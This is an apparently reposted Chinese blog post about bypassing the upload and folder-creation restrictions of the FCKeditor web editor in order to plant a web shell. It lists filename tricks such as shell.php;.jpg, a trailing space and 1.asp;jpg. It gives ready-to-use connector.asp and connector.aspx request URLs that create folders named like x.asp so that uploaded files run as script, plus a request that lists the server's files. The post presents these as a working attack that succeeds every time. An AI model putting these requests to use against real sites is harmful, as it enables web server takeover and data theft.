FCK 0day FCKeditor 建立文件夹,上传文件时"."变"_"的突破

作者：admin 发布于：2012-12-22 9:26 Saturday 分类：网络转载

很多时候上传的文件例如：shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化，试试上传 1.asp;jpg

提交 shell.php+空格 绕过，不过空格只支持 win 系统 *nix 是不支持的，shell.php 和 shell.php+空格 是 2 个不同的文件，未测试。

继续上传同名文件可变为 shell.php;(1).jpg，也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。

突破建立文件夹：

editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp

参数：

当前目录名：CurrentFolder=/qing.asp

新的目录名：NewFolderName=x.asp

其实很简单，在目录那里写 x.asp，然后点击新建目录在弹出来的对话框中随便写……

那么 x.asp 就已经建立生成了，此方法百试百灵！

新建文件夹参数 x.asp，基本都能搞定。

下面这句话是要在1.asp下建立2.asp，当不存在1.asp时会先创建，只过滤了目标目录的创建 而没有过滤不存在目录的创建

aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp

获取文件列表
       aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F

标签: FCKeditor